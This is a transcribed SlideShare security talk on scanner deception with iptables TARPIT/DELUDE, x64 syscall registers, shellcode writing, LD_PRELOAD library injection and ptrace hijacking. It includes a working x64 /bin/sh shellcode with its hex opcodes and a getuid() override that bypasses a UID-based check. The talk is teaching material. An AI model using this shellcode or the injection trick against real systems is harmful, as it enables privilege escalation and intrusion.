SlideShare a Scribd company logo

Code Red Security

Download as ODP, PDF
A
Amr Ali

The document discusses various techniques for deception and bypassing security checks, including: 1) Using iptables and the TARPIT and DELUDE targets to deceive port scanners by simulating open ports or terminating connections. 2) Writing x64 shellcode and understanding differences from x86 in CPU registers and the kernel ABI. 3) Performing DL-injection attacks by injecting a dynamic library to override functions like getuid() and bypass authentication. 4) Demonstrating process hijacking using ptrace() to inject shellcode and escalate privileges. 5) Mounting a local privilege escalation attack after gaining initial user access.

Technology
1 of 14
Downloaded 16 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
Code Red Security - The Art of Deception - x64 shell codes and kernel ABI - DL-Injection - Hijacking processes with ptrace() - DL-Injection attack vector (Don't try it at home) Session by Amr Ali http://amr-ali.co.cc/ [email_address]
The Art of Deception Kevin Mitnick
The Art of Deception - We are talking today about deceiving port scanners and other reconnaissance tools and/or techniques. Iptables is the main firewall used by Linux users around the world, so we are going to make great use of it with a little but very effective add-on called xtables . - TARPIT and DELUDE are the main targets xtables provides for our purposes. TARPIT captures and holds incoming TCP connections using no local per connection resources. Connections are accepted, but immediately switched to the persist state (0 byte window), in which the remote side stops sending data and asks to continue every 60-240 seconds. Attempts to close the connection are ignored, forcing the remote side to time out the connection in 12-24 minutes. SYN ---------------> Server SYN/ACK <-------------------- Server ACK ----------------------> Server WIN[0] <--------------------- Server
The Art of Deception - The DELUDE target will reply to a SYN packet with SYN/ACK, and to all other packets with a RST. This will terminate the connection much like REJECT, but network scanners doing TCP half open discovery can be spoofed to make them believe the port is open rather than closed/filtered. - In lesser words, if someone is doing a SYN scan the response to his packets by a SYN/ACK packet, but will receive a RST if she sent an ACK, so the connection will be terminated much like the REJECT target. Same applies for ACK scan(s). Of course you will have to make sure first that a scan in place, otherwise you will kill legitimate connections. SYN --------------------> Server SYN/ACK <------------------- Server ACK -----------------------> Server RST <------------------------ Server
The Art of Deception # nmap -v -A --reason --version-all --script all -T4 -n 192.168.1.100 Starting Nmap 5.00 ( http://nmap.org ) at 2010-04-03 02:56 EET NSE: Loaded 59 scripts for scanning. Initiating SYN Stealth Scan at 02:59 Scanning 192.168.1.100 [1000 ports] Discovered open port 4422/tcp on 192.168.1.100 Discovered open port 6/tcp on 192.168.1.100 Discovered open port 78/tcp on 192.168.1.100 Discovered open port 1337/tcp on 192.168.1.100 Discovered open port 31337/tcp on 192.168.1.100 Discovered open port 88/tcp on 192.168.1.100 Discovered open port 123/tcp on 192.168.1.100 Discovered open port 8879/tcp on 192.168.1.100 Discovered open port 550/tcp on 192.168.1.100 Discovered open port 9200/tcp on 192.168.1.100 Discovered open port 5/tcp on 192.168.1.100 Discovered open port 404/tcp on 192.168.1.100 ........
x64 shell codes and kernel ABI - x86 shell coders are very used and familiar with x86 CPU registers, and its plain kernel ABI, which are ..... EAX : Holds the system call number. EBX : Contains the value or address of the 1 st argument to the system call. ECX : Contains the value or address of the 2 nd argument to the system call. EDX : Contains the value or address of the 3 rd argument to the system call. EDI : General purpose register. ESI : General purpose register. EBP : Base Pointer register. ESP : Stack Pointer register. EIP : Instruction Pointer register. These registers are plain and simple, however when it comes to x64 platforms the kernel ABI changes a bit differently in which that extra general purpose registers are added, and system call arguments registers are different.
x64 shell codes and kernel ABI - x64 registers and kernel ABI are as fellows … RAX : Contains the system call number. RBX : General purpose register. RCX : General purpose register. RDX : The 3 rd argument for the system call. RDI : The 1 st argument for the system call. RSI : The 2 nd argument for the system call. RBP : Base Pointer register. RSP : Stack Pointer register. RIP : Instruction Pointer register. R8 : The 4 th argument for the system call. R9 : The 5 th argument for the system call. R10 : The 6 th argument for the system call. R11 – R15 : General purpose registers. - Of course these are 64bit register instead of their counter part 32bit registers.
x64 shell codes and kernel ABI - Lets write a little x64 shell code, shall we? [CODE] .global _start _start: xorq %rdx, %rdx push %rdx movq $0x68732f6e69622f2f, %rbx # //bin/bash push %rbx push %rsp pop %rdi push %rdx push %rdi push %rsp pop %rsi push $0x3b pop %rax syscall arg1: .string “//bin/sh” [/CODE]
x64 shell codes and kernel ABI - So after getting the opcodes for the shell code we've written we now can put it in a string as in the form of … \x48\x31\xd2\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x6a\x3b\x58\x0f\x05 - Now we should compile and run our assembly code to make sure its running... [email_address] (/tmp):$ as test.s -o test.o [email_address] (/tmp):$ ld -s test.o -o test [email_address] (/tmp):$ ./test # Now we have confirmed it is running, its only a matter of writing an exploit and the above shell code in a string to exploit whatever vulnerable piece of code you are targeting.
DL-Injection - DL-Injection is done by injecting a dynamic library in a compiled application to override certain functionalities called from other shared libraries. The technique used can be as simple as setting an environment v a riable ( LD_PRELOAD ) and as complex as overwriting certain application PLT ( Procedure Linkage Table ) entries. - This kind of attack can be very useful in applications that does internal authentication and does not ensure the integrity of the information the system provides. For example … [CODE] .... If (getuid() == 0) { // do stuff authenticated stuff here. } ....
DL-Injection - The previous code gets the UID of the user and executes certain codes based on that. However it does not make sure that this information is true in the sense that it is not spoofed. - Now we can easily bypass this security check by simply injecting a library into this application space with a function that overrides getuid() that always returns zero. [CODE] Int getuid() { return 0; } [/CODE] [email_address] (/tmp):$ gcc -shared -fPIC inj.c -o inj.so [email_address] (/tmp):$ LD_PRELOAD=/tmp/inj.so ./vuln_app - Now we successfully bypassed that application security, by spoofing getuid() to always return zero.
Hijacking Processes – ptrace() - ptrace() is a function used to debug applications by setting breakpoints or monitor the process' registers and memory with the right permissions. We'll see in a few lines a demonstration on how to hijack a process and inject a shell code into its execution flow through overwriting its IP ( Instruction Pointer ). - We'll demonstrate this on a 32bit platform and a 64bit platform to understand further the difference between each platform assembly and kernel ABI. LIVE DEMONSTRATION
DL-Injection Attack Vector - We'll now try to mount a local privilege escalation attack on a system, assuming that we already got normal user access.
Thanks Thanks All my presentation(s) files will be on my website. If you have any questions or comments please do not hesitate to visit my website or contact me via email http://amr-ali.co.cc [email_address] For job offers, please visit … http://amr-ali.co.cc/resume

More Related Content

PPTX
Socket programing
Pankil Agrawal
 
PPT
Socket Programming
Mostak Ahmed
 
PDF
20141106 asfws unicode_hacks
Cyber Security Alliance
 
PPT
Socket Programming it-slideshares.blogspot.com
phanleson
 
PDF
Networking lab
Ragu Ram
 
PDF
Socket programming
Rajivarnan (Rajiv)
 
PDF
Offline bruteforce attack on wi fi protected setup
Cyber Security Alliance
 
PPTX
Socket programming in c
Md. Golam Hossain
 
Socket programing
Pankil Agrawal
 
Socket Programming
Mostak Ahmed
 
20141106 asfws unicode_hacks
Cyber Security Alliance
 
Socket Programming it-slideshares.blogspot.com
phanleson
 
Networking lab
Ragu Ram
 
Socket programming
Rajivarnan (Rajiv)
 
Offline bruteforce attack on wi fi protected setup
Cyber Security Alliance
 
Socket programming in c
Md. Golam Hossain
 

What's hot (20)

PPT
Socket programming in C
Deepak Swain
 
DOCX
Lab manual cn-2012-13
Sasi Kala
 
PDF
Sockets
Rajesh Kumar
 
PDF
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
sonjeku1
 
TXT
Linuxserver harden
Gregory Hanis
 
PPTX
Network configuration
engshemachi
 
PPTX
DevSecCon London 2018: Get rid of these TLS certificates
DevSecCon
 
PPTX
Socket programming
Anurag Tomar
 
DOC
Networks lab manual ecp62
Basil John
 
PDF
Programming TCP/IP with Sockets
elliando dias
 
PPT
Socket Programming Tutorial
Jignesh Patel
 
PPTX
Linux networking commands
Sayed Ahmed
 
PPT
Module 3 Scanning
leminhvuong
 
PPTX
Basics of sockets
AviNash ChaVhan
 
PPTX
Socket Programming
VisualBee.com
 
PPT
Npc08
vamsitricks
 
PPT
Application Layer and Socket Programming
elliando dias
 
PPT
Basic socket programming
Kristian Arjianto
 
PDF
Sockets
Indrasena Reddy
 
PDF
Socket programming using C
Ajit Nayak
 
Socket programming in C
Deepak Swain
 
Lab manual cn-2012-13
Sasi Kala
 
Sockets
Rajesh Kumar
 
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
sonjeku1
 
Linuxserver harden
Gregory Hanis
 
Network configuration
engshemachi
 
DevSecCon London 2018: Get rid of these TLS certificates
DevSecCon
 
Socket programming
Anurag Tomar
 
Networks lab manual ecp62
Basil John
 
Programming TCP/IP with Sockets
elliando dias
 
Socket Programming Tutorial
Jignesh Patel
 
Linux networking commands
Sayed Ahmed
 
Module 3 Scanning
leminhvuong
 
Basics of sockets
AviNash ChaVhan
 
Socket Programming
VisualBee.com
 
Npc08
vamsitricks
 
Application Layer and Socket Programming
elliando dias
 
Basic socket programming
Kristian Arjianto
 
Sockets
Indrasena Reddy
 
Socket programming using C
Ajit Nayak
 
Ad

Similar to Code Red Security (20)

PDF
Advanced RAC troubleshooting: Network
Riyaj Shamsudeen
 
PDF
Please help with the below 3 questions, the python script is at the.pdf
support58
 
PDF
26.1.7 lab snort and firewall rules
Freddy Buenaño
 
PPT
Linux Networking Commands
tmavroidis
 
PPT
Writing Metasploit Plugins
amiable_indian
 
PPT
6005679.ppt
AlmaOraevi
 
DOCX
All contents are Copyright © 1992–2012 Cisco Systems, Inc. A.docx
galerussel59292
 
PDF
1-300-206 (SENSS)=Firewall (642-618)
Mohmed Abou Elenein Attia
 
PPT
managing your network environment
scooby_doo
 
PPT
In depth understanding network security
Thanawan Tuamyim
 
PPTX
04 - I love my OS, he protects me (sometimes, in specific circumstances)
Alexandre Moneger
 
PDF
Introduction to Industrial Control Systems : Pentesting PLCs 101 (BlackHat Eu...
arnaudsoullie
 
PPTX
Hunting for APT in network logs workshop presentation
OlehLevytskyi1
 
PPT
Cisco data center support
Krunal Shah
 
PDF
Debugging Ruby
Aman Gupta
 
PDF
Shellcoding in linux
Ajin Abraham
 
PDF
Buffer Overflow - Smashing the Stack
ironSource
 
PPTX
Buffer overflow – Smashing The Stack
Tomer Zait
 
PPT
Troubleshooting basic networks
Arnold Derrick Kinney
 
DOCX
INFA 620Laboratory 4 Configuring a FirewallIn this exercise.docx
carliotwaycave
 
Advanced RAC troubleshooting: Network
Riyaj Shamsudeen
 
Please help with the below 3 questions, the python script is at the.pdf
support58
 
26.1.7 lab snort and firewall rules
Freddy Buenaño
 
Linux Networking Commands
tmavroidis
 
Writing Metasploit Plugins
amiable_indian
 
6005679.ppt
AlmaOraevi
 
All contents are Copyright © 1992–2012 Cisco Systems, Inc. A.docx
galerussel59292
 
1-300-206 (SENSS)=Firewall (642-618)
Mohmed Abou Elenein Attia
 
managing your network environment
scooby_doo
 
In depth understanding network security
Thanawan Tuamyim
 
04 - I love my OS, he protects me (sometimes, in specific circumstances)
Alexandre Moneger
 
Introduction to Industrial Control Systems : Pentesting PLCs 101 (BlackHat Eu...
arnaudsoullie
 
Hunting for APT in network logs workshop presentation
OlehLevytskyi1
 
Cisco data center support
Krunal Shah
 
Debugging Ruby
Aman Gupta
 
Shellcoding in linux
Ajin Abraham
 
Buffer Overflow - Smashing the Stack
ironSource
 
Buffer overflow – Smashing The Stack
Tomer Zait
 
Troubleshooting basic networks
Arnold Derrick Kinney
 
INFA 620Laboratory 4 Configuring a FirewallIn this exercise.docx
carliotwaycave
 
Ad

Recently uploaded (20)

PDF
NewMind AI Weekly Chronicles - August'25 Week I
NewMind AI
 
PDF
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
Peter Tan
 
PDF
Per capita expenditure prediction using model stacking based on satellite ima...
IAESIJAI
 
PPTX
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
ReZa AdineH
 
PDF
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
SOFTTECHHUB
 
PPTX
Programs and apps: productivity, graphics, security and other tools
4mqw9zch22
 
PPT
Teaching material agriculture food technology
LiaRayya
 
PPTX
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
blackmambaettijean
 
PDF
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 
PPTX
Big Data Technologies - Introduction.pptx
kuthubussaman1
 
PDF
Dropbox Q2 2025 Financial Results & Investor Presentation
Dropbox
 
PDF
Encapsulation theory and applications.pdf
gurumoop
 
DOCX
The AUB Centre for AI in Media Proposal.docx
GAONE9
 
PPTX
Cloud computing and distributed systems.
kkkkkhan
 
PDF
Spectral efficient network and resource selection model in 5G networks
IAESIJAI
 
PPTX
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
PDF
Machine learning based COVID-19 study performance prediction
IAESIJAI
 
PPT
“AI and Expert System Decision Support & Business Intelligence Systems”
ZubinRadhakrishnan
 
PDF
Encapsulation_ Review paper, used for researhc scholars
gurumoop
 
PDF
Approach and Philosophy of On baking technology
30anthuong17
 
NewMind AI Weekly Chronicles - August'25 Week I
NewMind AI
 
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
Peter Tan
 
Per capita expenditure prediction using model stacking based on satellite ima...
IAESIJAI
 
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
ReZa AdineH
 
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
SOFTTECHHUB
 
Programs and apps: productivity, graphics, security and other tools
4mqw9zch22
 
Teaching material agriculture food technology
LiaRayya
 
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
blackmambaettijean
 
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 
Big Data Technologies - Introduction.pptx
kuthubussaman1
 
Dropbox Q2 2025 Financial Results & Investor Presentation
Dropbox
 
Encapsulation theory and applications.pdf
gurumoop
 
The AUB Centre for AI in Media Proposal.docx
GAONE9
 
Cloud computing and distributed systems.
kkkkkhan
 
Spectral efficient network and resource selection model in 5G networks
IAESIJAI
 
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
Machine learning based COVID-19 study performance prediction
IAESIJAI
 
“AI and Expert System Decision Support & Business Intelligence Systems”
ZubinRadhakrishnan
 
Encapsulation_ Review paper, used for researhc scholars
gurumoop
 
Approach and Philosophy of On baking technology
30anthuong17
 

Code Red Security

  • 1. Code Red Security - The Art of Deception - x64 shell codes and kernel ABI - DL-Injection - Hijacking processes with ptrace() - DL-Injection attack vector (Don't try it at home) Session by Amr Ali http://amr-ali.co.cc/ [email_address]
  • 2. The Art of Deception Kevin Mitnick
  • 3. The Art of Deception - We are talking today about deceiving port scanners and other reconnaissance tools and/or techniques. Iptables is the main firewall used by Linux users around the world, so we are going to make great use of it with a little but very effective add-on called xtables . - TARPIT and DELUDE are the main targets xtables provides for our purposes. TARPIT captures and holds incoming TCP connections using no local per connection resources. Connections are accepted, but immediately switched to the persist state (0 byte window), in which the remote side stops sending data and asks to continue every 60-240 seconds. Attempts to close the connection are ignored, forcing the remote side to time out the connection in 12-24 minutes. SYN ---------------> Server SYN/ACK <-------------------- Server ACK ----------------------> Server WIN[0] <--------------------- Server
  • 4. The Art of Deception - The DELUDE target will reply to a SYN packet with SYN/ACK, and to all other packets with a RST. This will terminate the connection much like REJECT, but network scanners doing TCP half open discovery can be spoofed to make them believe the port is open rather than closed/filtered. - In lesser words, if someone is doing a SYN scan the response to his packets by a SYN/ACK packet, but will receive a RST if she sent an ACK, so the connection will be terminated much like the REJECT target. Same applies for ACK scan(s). Of course you will have to make sure first that a scan in place, otherwise you will kill legitimate connections. SYN --------------------> Server SYN/ACK <------------------- Server ACK -----------------------> Server RST <------------------------ Server
  • 5. The Art of Deception # nmap -v -A --reason --version-all --script all -T4 -n 192.168.1.100 Starting Nmap 5.00 ( http://nmap.org ) at 2010-04-03 02:56 EET NSE: Loaded 59 scripts for scanning. Initiating SYN Stealth Scan at 02:59 Scanning 192.168.1.100 [1000 ports] Discovered open port 4422/tcp on 192.168.1.100 Discovered open port 6/tcp on 192.168.1.100 Discovered open port 78/tcp on 192.168.1.100 Discovered open port 1337/tcp on 192.168.1.100 Discovered open port 31337/tcp on 192.168.1.100 Discovered open port 88/tcp on 192.168.1.100 Discovered open port 123/tcp on 192.168.1.100 Discovered open port 8879/tcp on 192.168.1.100 Discovered open port 550/tcp on 192.168.1.100 Discovered open port 9200/tcp on 192.168.1.100 Discovered open port 5/tcp on 192.168.1.100 Discovered open port 404/tcp on 192.168.1.100 ........
  • 6. x64 shell codes and kernel ABI - x86 shell coders are very used and familiar with x86 CPU registers, and its plain kernel ABI, which are ..... EAX : Holds the system call number. EBX : Contains the value or address of the 1 st argument to the system call. ECX : Contains the value or address of the 2 nd argument to the system call. EDX : Contains the value or address of the 3 rd argument to the system call. EDI : General purpose register. ESI : General purpose register. EBP : Base Pointer register. ESP : Stack Pointer register. EIP : Instruction Pointer register. These registers are plain and simple, however when it comes to x64 platforms the kernel ABI changes a bit differently in which that extra general purpose registers are added, and system call arguments registers are different.
  • 7. x64 shell codes and kernel ABI - x64 registers and kernel ABI are as fellows … RAX : Contains the system call number. RBX : General purpose register. RCX : General purpose register. RDX : The 3 rd argument for the system call. RDI : The 1 st argument for the system call. RSI : The 2 nd argument for the system call. RBP : Base Pointer register. RSP : Stack Pointer register. RIP : Instruction Pointer register. R8 : The 4 th argument for the system call. R9 : The 5 th argument for the system call. R10 : The 6 th argument for the system call. R11 – R15 : General purpose registers. - Of course these are 64bit register instead of their counter part 32bit registers.
  • 8. x64 shell codes and kernel ABI - Lets write a little x64 shell code, shall we? [CODE] .global _start _start: xorq %rdx, %rdx push %rdx movq $0x68732f6e69622f2f, %rbx # //bin/bash push %rbx push %rsp pop %rdi push %rdx push %rdi push %rsp pop %rsi push $0x3b pop %rax syscall arg1: .string “//bin/sh” [/CODE]
  • 9. x64 shell codes and kernel ABI - So after getting the opcodes for the shell code we've written we now can put it in a string as in the form of … \x48\x31\xd2\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x6a\x3b\x58\x0f\x05 - Now we should compile and run our assembly code to make sure its running... [email_address] (/tmp):$ as test.s -o test.o [email_address] (/tmp):$ ld -s test.o -o test [email_address] (/tmp):$ ./test # Now we have confirmed it is running, its only a matter of writing an exploit and the above shell code in a string to exploit whatever vulnerable piece of code you are targeting.
  • 10. DL-Injection - DL-Injection is done by injecting a dynamic library in a compiled application to override certain functionalities called from other shared libraries. The technique used can be as simple as setting an environment v a riable ( LD_PRELOAD ) and as complex as overwriting certain application PLT ( Procedure Linkage Table ) entries. - This kind of attack can be very useful in applications that does internal authentication and does not ensure the integrity of the information the system provides. For example … [CODE] .... If (getuid() == 0) { // do stuff authenticated stuff here. } ....
  • 11. DL-Injection - The previous code gets the UID of the user and executes certain codes based on that. However it does not make sure that this information is true in the sense that it is not spoofed. - Now we can easily bypass this security check by simply injecting a library into this application space with a function that overrides getuid() that always returns zero. [CODE] Int getuid() { return 0; } [/CODE] [email_address] (/tmp):$ gcc -shared -fPIC inj.c -o inj.so [email_address] (/tmp):$ LD_PRELOAD=/tmp/inj.so ./vuln_app - Now we successfully bypassed that application security, by spoofing getuid() to always return zero.
  • 12. Hijacking Processes – ptrace() - ptrace() is a function used to debug applications by setting breakpoints or monitor the process' registers and memory with the right permissions. We'll see in a few lines a demonstration on how to hijack a process and inject a shell code into its execution flow through overwriting its IP ( Instruction Pointer ). - We'll demonstrate this on a 32bit platform and a 64bit platform to understand further the difference between each platform assembly and kernel ABI. LIVE DEMONSTRATION
  • 13. DL-Injection Attack Vector - We'll now try to mount a local privilege escalation attack on a system, assuming that we already got normal user access.
  • 14. Thanks Thanks All my presentation(s) files will be on my website. If you have any questions or comments please do not hesitate to visit my website or contact me via email http://amr-ali.co.cc [email_address] For job offers, please visit … http://amr-ali.co.cc/resume